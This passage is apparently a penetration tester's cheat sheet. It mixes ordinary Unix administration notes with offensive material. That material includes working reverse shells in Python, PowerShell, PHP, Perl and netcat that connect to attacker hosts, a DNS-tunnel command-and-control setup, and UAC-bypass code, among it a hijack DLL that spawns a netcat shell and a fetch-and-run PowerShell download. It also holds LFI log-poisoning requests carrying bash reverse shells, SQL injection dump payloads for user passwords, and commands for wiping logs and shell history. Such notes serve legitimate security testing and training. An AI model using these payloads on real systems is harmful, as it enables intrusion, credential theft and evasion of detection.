import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close() ``` ## PowerShell System.Net.Sockets.TCPClient: ``` $client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ## PHP ```php <?php echo passthru("/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"); ?> ``` ## Perl ``` use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}; ``` ## Netcat ``` $ {nc.tradentional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash ``` ## Meterpreter ### unicorn * [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) ``` $ ./unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443 $ sudo msfconsole -qr unicorn.rc PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt') ``` ## Listeners ``` $ {nc.tradentional|nc|ncat|netcat} [-6] -lvnp <LPORT> ``` ## Upgrade to PTY * [https://forum.hackthebox.eu/discussion/comment/22312#Comment_22312](https://forum.hackthebox.eu/discussion/comment/22312#Comment_22312) * [https://xakep.ru/2019/07/16/mischief/#toc05.1](https://xakep.ru/2019/07/16/mischief/#toc05.1) * [https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/](https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/) ``` $ python -c 'import pty; pty.spawn("/bin/bash")' $ python3 -c 'import pty; pty.spawn("/bin/bash")' Or $ script -q /dev/null sh user@remote:$ ^Z (background) root@kali:$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' (get ROWS and COLS) root@kali:$ stty raw -echo; fg (opt) user@remote:$ reset user@remote:$ stty rows ${ROWS} cols ${COLS} user@remote:$ export TERM=xterm (or xterm-color or xterm-256color) (opt) user@remote:$ exec /bin/bash [-l] ``` ## Transport over DNS * [https://xakep.ru/2018/09/07/dns-tunneling/](https://xakep.ru/2018/09/07/dns-tunneling/) ### chashell * [https://github.com/sysdream/chashell](https://github.com/sysdream/chashell) Buy and configure DNS (e. g., `c2cdomain.net`): ``` A * -> <IP> A @ -> <IP> A chashell -> <IP> NS c -> chashell.c2cdomain.net ``` Get dependencies: ``` $ export GOPATH=/home/snovvcrash/code/go $ export PATH=$GOPATH:$GOPATH/bin:$PATH $ go get -v -u github.com/golang/dep/cmd/dep $ go get github.com/mitchellh/gox $ cd $GOPATH/src/github.com/golang/dep $ go install ./... ``` Clone chashell into `$GOPATH/src` (otherwise, `dep` will error out): ``` $ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell $ cd $GOPATH/src/chashell ``` Build binaries: ``` $ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))') $ export DOMAIN_NAME=c.c2cdomain.net $ make build-all OSARCH="linux/amd64" ``` Run server on Attacker: ``` $ cd release/ $ sudo systemctl stop systemd-resolved $ sudo ./chaserv_linux_amd64 ``` Run client on Victim: ``` $ ./chashell_linux_amd64 ``` ## Helpers ### pwncat * [https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/](https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/) * [https://github.com/cytopia/pwncat](https://github.com/cytopia/pwncat) ### VbRev * [https://github.com/VbScrub/VbRev](https://github.com/VbScrub/VbRev) ### xc * [https://github.com/xct/xc](https://github.com/xct/xc) Listen: ``` $ rlwrap ./xc -l -p 443 ``` Launch: ``` PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443" ``` ### Payload Generators * [http://www.jackson-t.ca/runtime-exec-payloads.html](http://www.jackson-t.ca/runtime-exec-payloads.html) * [https://www.revshells.com/](https://www.revshells.com/) #### ShellPop * [https://github.com/0x00-0x00/ShellPop](https://github.com/0x00-0x00/ShellPop) Bash reverse TCP: ``` $ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64 ``` # SMB Check for SMB vulnerablities with Nmap: ``` $ sudo nmap -sV --script-args=unsafe=1 --script smb-os-discovery 10.10.13.37 -p139,445 $ sudo nmap -n -Pn -sV --script 'smb-vuln*' 10.10.13.37 -p445 ``` ## Fingerprint * [https://book.hacktricks.xyz/pentesting/pentesting-smb#smb-server-version](https://book.hacktricks.xyz/pentesting/pentesting-smb#smb-server-version) Get SMB version for ancient versions of Samba (for security reasons modern clients will not initiate connection with old protocols in use): ``` $ sudo ngrep -i -d eth0 's.?a.?m.?b.?a.*[[:digit:]]' port 139 $ echo exit | smbclient -N -L 10.10.13.37 --option='client min protocol=LANMAN1' ``` ## Mounting Mount: ``` $ sudo mount -t cifs '//127.0.0.1/Users' /mnt/smb -v -o user=snovvcrash,[pass='Passw0rd!'] ``` Status: ``` $ mount -v | grep 'type cifs' $ df -k -F cifs ``` Unmount: ``` $ sudo umount /mnt/smb ``` ## smbclient Null authentication: ``` $ smbclient -N -L 127.0.0.1 $ smbclient -N '\\127.0.0.1\Data' ``` With user creds: ``` $ smbclient -U snovvcrash '\\127.0.0.1\Users' 'Passw0rd!' ``` Get all files recursively: ``` smb: \> recurse ON smb: \> prompt OFF smb: \> mget * ``` ## smbmap Null authentication: ``` $ smbmap -H 127.0.0.1 -u anonymous -R $ smbmap -H 127.0.0.1 -u null -p "" -R ``` # SNMP ## onesixtyone ``` $ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.10.13.37 ``` ## snmp-check ``` $ snmp-check -v 2c -c public 10.10.13.37 ``` # SE ## Infra * [https://github.com/n0pe-sled/Postfix-Server-Setup](https://github.com/n0pe-sled/Postfix-Server-Setup) ## Tools * [https://github.com/decalage2/oletools](https://github.com/decalage2/oletools) * [https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack) # TFTP Enum with Nmap: ``` $ sudo nmap -sVU -p69 --script tftp-enum 10.10.13.37 ``` ## Brute Force Filenames Make a list of potential filenames. Use 8.3 notation: ``` PS > cmd /c dir /x PS > cmd /c "for %I in (.) do @echo %~sI" ``` Download Python TFTP implementation and use the Bash script below: * [https://github.com/m4tx/pyTFTP](https://github.com/m4tx/pyTFTP) ``` $ git clone https://github.com/m4tx/pyTFTP && cd pyTFTP $ ./tftp-brute.sh 10.10.13.37 files.txt ``` ```bash #!/usr/bin/env bash IP=$1 FILES=$2 while IFS= read -r file; do echo -n "[*] Trying ${file}... " if ./client.py -g "${file}" "${IP}" > /dev/null 2>&1; then echo "SUCCESS" else echo "FAIL" fi done < "${FILES}" ``` # UAC Bypass * [https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC](https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC) ## SystemPropertiesAdvanced.exe ### srrstr.dll ```c #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved) { switch(dwReason) { case DLL_PROCESS_ATTACH: WinExec("C:\\Users\\<USERNAME>\\Documents\\nc.exe 10.10.14.16 1337 -e powershell", 0); case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return 0; } ``` Compile on Kali: ``` $ i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared ``` ### DLL Hijacking Upload `srrstr.dll` to `C:\Users\%USERNAME%\AppData\Local\Microsoft\WindowsApps\srrstr.dll` and check it: ``` PS > rundll32.exe srrstr.dll,xyz ``` Exec and get a shell ("requires an interactive window station"): ``` PS > cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe ``` * [https://egre55.github.io/system-properties-uac-bypass](https://egre55.github.io/system-properties-uac-bypass) * [https://www.youtube.com/watch?v=krC5j1Ab44I&t=3570s](https://www.youtube.com/watch?v=krC5j1Ab44I&t=3570s) ## cmstp.exe * [0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html) ``` PS > IEX(New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/snovvcrash/362be57caaa167e7f5667156ac80f445/raw/1990959bc80b56179863aede06695bc499249744/Bypass-UAC.ps1') PS > Bypass-UAC -C "C:\Users\snovvcrash\music\met.exe" ``` ## fodhelper ``` PS > New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force PS > New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force Cmd > fodhelper ``` # Unix ## Encodings From CP1252 to UTF-8: ``` $ iconv -f CP1252 -t UTF8 inputfile.txt -o outputfile.txt Or $ enconv -x UTF8 somefile.txt ``` Check: ``` $ enconv -d somefile.txt Or $ file -i somefile.txt ``` Remove ANSI escape codes: ``` $ awk '{ gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' somefile.txt ``` ### Windows/Unix Text ``` input.txt: ASCII text VS input.txt: ASCII text, with CRLF line terminators ``` From Win to Unix: ``` $ awk '{ sub("\r$", ""); print }' input.txt > output.txt Or $ dos2unix input.txt ``` From Unix to Win: ``` $ awk 'sub("$", "\r")' input.txt > output.txt Or $ unix2dos input.txt ``` ## Network ### Connections ``` $ netstat -anlp | grep LIST $ ss -nlpt | grep LIST ``` ### Public IP ``` $ wget -q -O - https://ipinfo.io/ip ``` ## Virtual Terminal ``` Start: CTRL + ALT + F1-6 Stop: ALT + F8 ``` ## Process Kill ``` $ ps aux | grep firefox Or $ pidof firefox $ kill -15 <PID> Or $ kill -SIGTERM <PID> Or $ kill <PID> If -15 signal didn't help, use stronger -9 signal: $ kill -9 <PID> Or $ kill -SIGKILL <PID> ``` ## Dev ### Git Add SSH key to the ssh-agent: ``` $ eval "$(ssh-agent -s)" $ ssh-add ~/.ssh/id_rsa ``` Update to latest version: ``` $ sudo add-apt-repository ppa:git-core/ppa -y $ sudo apt update $ sudo apt install git -y $ git version ``` Syncing a forked repository: ``` $ git remote add upstream https://github.com/original/repository.git $ git fetch upstream $ git checkout --track master $ git rebase upstream/master (or git merge upstream/master) $ git push -f origin master ``` Working with a repository during a pull request: ``` $ git remote add upstream https://github.com/original/repository.git $ git fetch upstream $ git rebase upstream/master $ git checkout upstream/master $ git checkout -b new-feature ...Make changes... $ gc -am "Add a new feature" $ git push -u origin new-feature ``` ### C Library Path ``` $ echo '#include <sys/types.h>'' | gcc -E -x c - | grep '/types.h' ``` ### Vangrind ``` $ valgrind --leak-check=full --track-origins=yes --leak-resolution=med ./a.out ``` ## OpenSSL ### Encrypt/Decrypt ``` $ openssl enc -e -aes-128-ecb -in file.txt -out file.txt.ecb -K 10101010 $ openssl enc -d -aes-128-ecb -in file.txt.ecb -out file.txt.ecb_dec -K 10101010 $ echo 'secret_data1 + secret_data2 + secret_data3' | openssl enc -e -aes-256-cbc -a -salt -md sha256 -iv 10101010 -pass pass:qwerty $ echo 'U2FsdGVkX1+d1qH1M3nhYFKscrg5QYt+AlTSBPHgdB4JEP8YSy1FX+xYdrfJ5cZgfoGrW+2On7lMxRIhKCUmWQ==' | openssl enc -d -aes-256-cbc -a -salt -md sha256 -iv 10101010 -pass pass:qwerty ``` ### Generate Keys ``` $ ssh-keygen -t rsa -b 4096 -N 's3cr3t_p4ssw0rd' -C '[email protected]' -f rsa_key $ mv rsa_key rsa_key.old $ openssl pkcs8 -topk8 -v2 des3 \ -in rsa_key.old -passin 'pass:s3cr3t_p4ssw0rd' \ -out rsa_key -passout 'pass:s3cr3t_p4ssw0rd' $ chmod 600 rsa_key $ openssl rsa -text -in rsa_key -passin 'pass:s3cr3t_p4ssw0rd' $ openssl asn1parse -in rsa_key $ ssh-keygen -o -a 100 -t ed25519 -f ~/.ssh/id_ed25519 ``` ## GPG * [https://www.linode.com/docs/security/encryption/gpg-keys-to-send-encrypted-messages/](https://www.linode.com/docs/security/encryption/gpg-keys-to-send-encrypted-messages/) * [https://habr.com/ru/post/358182/](https://habr.com/ru/post/358182/) * [https://hackware.ru/?p=8215](https://hackware.ru/?p=8215) List keychain: ``` $ gpg --list-keys ``` Gen key: ``` $ gpg --full-generate-key [--expert] ``` Gen revoke cert: ``` $ gpg --output revoke.asc --gen-revoke [email protected] revoke.asc ``` Export user's public key: ``` $ gpg --armor --output user.pub --export [email protected] user.pub ``` Import recipient's public key: ``` $ gpg --import recipient.pub ``` Sign and encrypt: ``` $ gpg -o/--output encrypted.txt.gpg -e/--encrypt -s/--sign -u/--local-user [email protected] -r/--recipient [email protected] plaintext.txt encrypted.txt.gpg ``` List recipients: ``` $ gpg --list-only -v -d/--decrypt encrypted.txt.gpg ``` Verify signature: ``` $ gpg --verify signed.txt.gpg $ gpg --verify signed.txt.sig signed.txt ``` Decrypt and verify: ``` $ gpg -o/--output decrypted.txt -d/--decrypt --try-secret-key [email protected] encrypted.txt.gpg $ gpg -o/--output decrypted.txt -d/--decrypt -u/--local-user [email protected] -r/--recipient [email protected] encrypted.txt.gpg ``` ### Signing Git Commits * [https://www.youtube.com/watch?v=1vVIpIvboSg](https://www.youtube.com/watch?v=1vVIpIvboSg) * [https://www.youtube.com/watch?v=4166ExAnxmo](https://www.youtube.com/watch?v=4166ExAnxmo) Cache passphrase in gpg agent (dirty): ``` $ cd /tmp && touch aaa && gpg --sign aaa && rm aaa aaa.gpg && cd - ``` ## Clear ### Log Files ``` $ > logfile Or $ cat /dev/null > logfile Or $ dd if=/dev/null of=logfile Or $ truncate logfile --size 0 ``` ### .bash_history ``` $ cat /dev/null > ~/.bash_history && history -c && exit ``` ## Secure Delete ``` $ shred -zvu -n7 /path/to/file $ find /path/to/dir -type f -exec shred -zvu -n7 {} \\; $ shred -zv -n0 /dev/sdc1 ``` ## Partitions * [https://youtu.be/QSpGaeHlkoE](https://youtu.be/QSpGaeHlkoE) List devices: ``` $ lsblk $ sudo fdisk -l $ df -h ``` Manage partitions: ``` $ sudo fdisk /dev/sd?? ``` Format: ``` $ sudo umount /dev/sd?? $ sudo mkfs.<type> -F 32 -I /dev/sd?? -n VOLUME-NAME type: 'msdos' (=fat32), 'ntfs' ``` ## Floppy ``` $ mcopy -i floppy.img 123.txt ::123.txt $ mdel -i floppy.img 123.TXT ``` ## Checksums Compare file hashes: ``` $ md5sum /path/to/abc.txt | awk '{print $1, "/path/to/cba.txt"}' > /tmp/checksum.txt $ md5sum -c /tmp/checksum.txt ``` Compare directory hashes: ``` $ hashdeep -c md5 -r /path/to/dir1 > dir1hashes.txt $ hashdeep -c md5 -r -X -k dir1hashes.txt /path/to/dir2 ``` ## Permissions Set defaults for files: ``` $ find . -type f -exec chmod 644 {} \; ``` Set defaults for directories: ``` $ find . -type d -exec chmod 755 {} \; ``` ## Fix Linux Freezes while Copying ``` $ sudo crontab -l | { cat; echo '@reboot echo $((16*1024*1024)) > /proc/sys/vm/dirty_background_bytes'; } | crontab - $ sudo crontab -l | { cat; echo '@reboot echo $((48*1024*1024)) > /proc/sys/vm/dirty_bytes'; } | crontab - ``` ## Kernel Remove old kernels: ``` $ dpkg -l linux-image-\* | grep ^ii $ kernelver=$(uname -r | sed -r 's/-[a-z]+//') $ dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve $kernelver $ sudo apt-get purge $(dpkg -l linux-{image,headers}-"[0-9]*" | awk '/ii/{print $2}' | grep -ve "$(uname -r | sed -r 's/-[a-z]+//')") ``` ## Xfce4 Install `xfce4`: ``` $ sudo apt update $ sudo apt upgrade -y $ sudo apt install xfce4 xfce4-terminal gtk2-engines-pixbuf -y ``` ## GIFs ``` $ sudo apt install peek -y Or $ sudo apt install byzanz xdotool -y $ xdotool getmouselocation $ byzanz-record --duration=15 --x=130 --y=90 --width=800 --height=500 ~/Desktop/out.gif ``` ## NTP ``` $ sudo apt purge ntp -y $ sudo timedatectl set-timezone Europe/Moscow $ sudo vi /etc/systemd/timesyncd.conf NTP=0.ru.pool.ntp.org 1.ru.pool.ntp.org 2.ru.pool.ntp.org 3.ru.pool.ntp.org $ sudo service systemd-timesyncd restart $ sudo timedatectl set-ntp true $ timedatectl status $ service systemd-timesyncd status $ service systemd-timedated status ``` 1. [https://feeding.cloud.geek.nz/posts/time-synchronization-with-ntp-and-systemd/](https://feeding.cloud.geek.nz/posts/time-synchronization-with-ntp-and-systemd/) 2. [http://billauer.co.il/blog/2019/01/ntp-systemd/](http://billauer.co.il/blog/2019/01/ntp-systemd/) ## ImageMagick XOR 2 images: ``` $ convert img1.png img2.png -fx "(((255*u)&(255*(1-v)))|((255*(1-u))&(255*v)))/255" img_out ``` ## Utilities Syntax ### tar #### .tar Pack: ``` tar -cvf directory.tar directory ``` Unpack: ``` tar -xvf directory.tar ``` #### .tar.gz Pack: ``` tar -cvzf directory.tar.gz directory ``` Unpack: ``` tar -xvzf directory.tar.gz ``` #### .tar.bz Pack: ``` tar -cvjf directory.tar.bz directory ``` Unpack: ``` tar -xvjf directory.tar.bz ``` ### scp Local file to a remote system: ``` $ scp [-P 2222] file.txt [email protected]:/remote/directory ``` Remote file to a local system: ``` $ scp [-P 2222] [email protected]:/remote/file.txt /local/directory ``` ### 7z Encrypt and pack all files in directory:: ``` $ 7z a packed.7z -mhe -p"p4sSw0rD" * ``` Decrypt and unpack: ``` $ 7z e packed.7z -p"p4sSw0rD" ``` ### grep/find/sed Recursive grep: ``` $ grep -nwr 'pattern' /path/to/dir ``` Recursive find and replace: ``` $ find . -type f -name "*.txt" -exec sed -i'' -e 's/\<foo\>/bar/g' {} + ``` Exec `strings` and grep on the result with printing filenames: ``` $ find . -type f -print -exec sh -c 'strings $1 | grep -i -n "signature"' sh {} \; ``` Find and `xargs` grep results: ``` $ find . -type f -print0 | xargs -0 grep <PATTERN> ``` ### readlink Get absolute path of a file: ``` $ readlink -f somefile.txt ``` ### dpkg ``` $ dpkg -s <package_name> $ dpkg-query -W -f='${Status}' <package_name> $ OUT="dpkg-query-$(date +'%FT%H%M%S').csv"; echo 'package,version' > ${OUT} && dpkg-query -W -f '${Package},${Version}\n' >> ${OUT} ``` ### iptables * [An In-Depth Guide to iptables, the Linux Firewall - Boolean World](https://www.booleanworld.com/depth-guide-iptables-linux-firewall/) List rules in all chains (default table is *filter*, there are *mangle*, *nat* and *raw* tables beside it): ``` $ sudo iptables -L -n --line-numbers [-t filter] ``` Print rules for all chains (for a specific chains): ``` $ sudo iptables -S [INPUT [1]] ``` ### fail2ban ```bash # Filters location which turn into *user-defined* fail2ban iptables rules (automatically) /etc/fail2ban/filter.d # Status $ sudo service fail2ban status $ sudo fail2ban-client status $ sudo fail2ban-client status sshd # Unban all $ sudo fail2ban-client unban --all ``` ### veracrypt * [https://www.veracrypt.fr/en/Downloads.html](https://www.veracrypt.fr/en/Downloads.html) ``` $ veracrypt -t --pim=0 --keyfiles='' --protect-hidden=no /home/snovvcrash/SecretVolume.dat /mnt $ veracrypt -d ``` ### openconnect ``` $ sudo openconnect --protocol=gp gp.megacorp.com -u snovvcrash ``` ## Console Logging ### script ``` $ script tool-$(date "+%FT%H%M%S").script ``` ### tmux * [https://github.com/tmux-plugins/tmux-logging](https://github.com/tmux-plugins/tmux-logging) ``` bash ~/.tmux/plugins/tmux-logging/scripts/screen_capture.sh bash ~/.tmux/plugins/tmux-logging/scripts/save_complete_history.sh ``` ### Time in Prompt #### bash `~/.bashrc` (replace `!` with `%`): ``` PS1='${debian_chroot:!($debian_chroot)}[\D!d}|\D{!k:!M}] \[\033[01;32m\]λ \[\033[00m\]\[\033[01;34m\]\w\[\033[00m\] ' ``` #### zsh `$ZSH_CUSTOM/themes/robbyrussell.zsh-theme` (replace `!` with `%`): ``` PROMPT="!(?:!{$fg_bold[green]!}➜ :!{$fg_bold[red]!}➜ ) " PROMPT+='!{$fg[cyan]!}!(4~|!-1~/…/!2~|!3~)!{$reset_color!} $(git_prompt_info)' if lsof -tac script "$(tty)" > /dev/null; then PROMPT="[!D{!d}|!D{!k:!M}]* $PROMPT" else PROMPT="[!D{!d}|!D{!k:!M}] $PROMPT" fi ``` ## LAMP * [https://stackoverflow.com/a/46908573](https://stackoverflow.com/a/46908573) ``` # PHP $ sudo add-apt-repository ppa:ondrej/php -y $ sudo apt update $ sudo apt install php7.2 -y $ sudo apt install php7.2-curl php7.2-gd php7.2-json php7.2-mbstring -y # Apache $ sudo apt install apache2 libapache2-mod-php7.2 -y $ sudo service apache2 restart # MySQL $ sudo apt install mysql-server php7.2-mysql $ sudo mysql_secure_installation $ service mysql restart # Test $ sudo sh -c 'echo "<?php phpinfo(); ?>" > phpinfo.php' -> http://127.0.0.1/phpinfo.php ``` ## Fun ### CMatrix ``` $ sudo apt-get install cmatrix ``` ### screenfetch ``` $ wget -O screenfetch https://raw.github.com/KittyKatt/screenFetch/master/screenfetch-dev $ chmod +x screenfetch $ sudo mv screenfetch /usr/bin ``` # VNC Enum with MSF: ``` msf > use auxiliary/scanner/vnc/vnc_none_auth ``` ## TightVNC * [https://github.com/frizb/PasswordDecrypts](https://github.com/frizb/PasswordDecrypts) Decrypt TightVNC password with MSF: ``` msf > irb >> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07" => "\u0017Rk\u0006#NX\a" >> require 'rex/proto/rfb' => true >> Rex::Proto::RFB::Cipher.decrypt ["f0f0f0f0f0f0f0f0"].pack('H*'), fixedkey => "<DECRYPTED>" ``` # VirtualBox ## DHCP ``` Cmd > "C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" dhcpserver add --netname intnet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.101 --upperip 10.0.1.254 --enable ``` ## Shared Folders ``` $ sudo usermod -aG vboxsf `whoami` $ sudo reboot ``` ## Dirty Network Configurations Manually: ``` $ sudo service NetworkManager stop $ sudo ifconfig $ sudo ifconfig eth0 10.10.13.37 netmask 255.255.255.0 $ sudo route add default gw 10.10.13.1 dev eth0 $ sudo route -n $ sudo vi /etc/resolv.conf $ ping 8.8.8.8 $ nslookup ya.ru $ sudo systemctl enable ssh --now ``` Route inner traffic to eth0 (lan), internet to wlan0 (wan): ``` $ sudo route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.0.1 0.0.0.0 UG 100 0 0 eth0 0.0.0.0 172.20.10.1 0.0.0.0 UG 600 0 0 wlan0 172.20.10.0 0.0.0.0 255.255.255.240 U 600 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 $ sudo ip route add 192.168.0.0/16 via 192.168.0.1 metric 100 dev eth0 $ sudo ip route add 172.16.0.0/12 via 192.168.0.1 metric 100 dev eth0 $ sudo ip route add 10.0.0.0/8 via 192.168.0.1 metric 100 dev eth0 $ sudo ip route del 0.0.0.0/0 via 192.168.0.1 dev eth0 $ sudo route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 172.20.10.1 0.0.0.0 UG 600 0 0 wlan0 10.0.0.0 192.168.0.1 255.0.0.0 UG 100 0 0 eth0 172.16.0.0 192.168.0.1 255.240.0.0 UG 100 0 0 eth0 172.20.10.0 0.0.0.0 255.255.255.240 U 600 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 192.168.0.0 192.168.0.1 255.255.0.0 UG 100 0 0 eth0 $ sudo chattr -i /etc/resolv.conf $ sudo vi /etc/resolv.conf ...change dns resolve order if necessary... ``` ### netplan `/etc/netplan/*.yaml`: ``` network: version: 2 renderer: networkd ethernets: eth0: addresses: [10.10.13.37/24] gateway4: 10.10.13.1 dhcp4: true optional: true nameservers: addresses: [8.8.8.8,8.8.4.4] ``` ``` $ sudo service NetworkManager stop $ sudo netplan apply ``` # WSUS * [https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus) ## WSUS HTTP (MitM) * [https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf) * [https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/](https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/) ### Check ``` PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer WUServer REG_SZ http://WSUS-SRV.megacorp.local:8530 PS > reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer UseWUServer REG_DWORD 0x1 ``` ## WSUS Local Proxy (LPE) * [https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/) # Web ## WAF Enum WAF: ``` $ nmap -sV --script http-waf-detect 127.0.0.1 -p80 $ nmap -sV --script http-waf-fingerprint 127.0.0.1 -p80 + wafw00f.py ``` ## LFI/RFI ### PHP RFI with SMB * [http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html) `/etc/samba/smb.conf`: ``` log level = 3 [share] comment = TEMP path = /tmp/smb writable = no guest ok = yes guest only = yes read only = yes browsable = yes directory mode = 0555 force user = nobody ``` ``` $ chmod 0555 /tmp/smb $ chown -R nobody:nogroup /tmp/smb $ service smbd restart $ tail -f /var/log/samba/log.<HOSTNAME> ``` ### Log Poisoning #### PHP * [https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899](https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899) * [https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1) Access log (needs single `'` instead of double `"`): ``` $ nc 127.0.0.1 80 GET /<?php system($_GET['cmd']); ?> $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//var//log//apache2//access.log&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' Or $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//proc//self//fd//1&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' ``` Error log: ``` $ curl -X POST 'http://127.0.0.1/vuln1.php' --form "userfile=@docx/sample.docx" --form 'submit=Generate pdf' --referer 'http://nowhere.com/<?php system($_GET["cmd"]); ?>' $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//var//log//apache2//error.log&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' Or $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//proc//self//fd//2&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' ``` ## SQLi ### MySQL #### DIOS * [https://defcon.ru/web-security/2320/](https://defcon.ru/web-security/2320/) * [http://www.securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html](http://www.securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html) * [https://dba.stackexchange.com/questions/4169/how-to-use-variables-inside-a-select-sql-server](https://dba.stackexchange.com/questions/4169/how-to-use-variables-inside-a-select-sql-server) * [https://www.mssqltips.com/sqlservertip/6038/sql-server-derived-table-example/](https://www.mssqltips.com/sqlservertip/6038/sql-server-derived-table-example/) ``` id=1' UNION SELECT 1,(SELECT (@a) FROM (SELECT (@a:=0x00),(SELECT (@a) FROM (information_schema.columns) WHERE (@a) IN (@a:=concat(@a,'<font color=red>',table_schema,'</font>',' ::: ','<font color=green>',table_name,'</font>','<br>'))))a);-- - SELECT (@a) FROM ( SELECT(@a:=0x00), ( SELECT (@a) FROM (information_schema.schemata) WHERE (@a) IN (@a:=concat(@a,schema_name,'\n')) ) ) foo ``` ``` id=1' UNION SELECT 1,(SELECT (@a) FROM (SELECT (@a:=0x00),(SELECT (@a) FROM (mytable.users) WHERE (@a) IN (@a:=concat(@a,':::',id,':::',login,':::',password)) AND is_admin='1'))a);-- - ``` #### Truncation Attack * 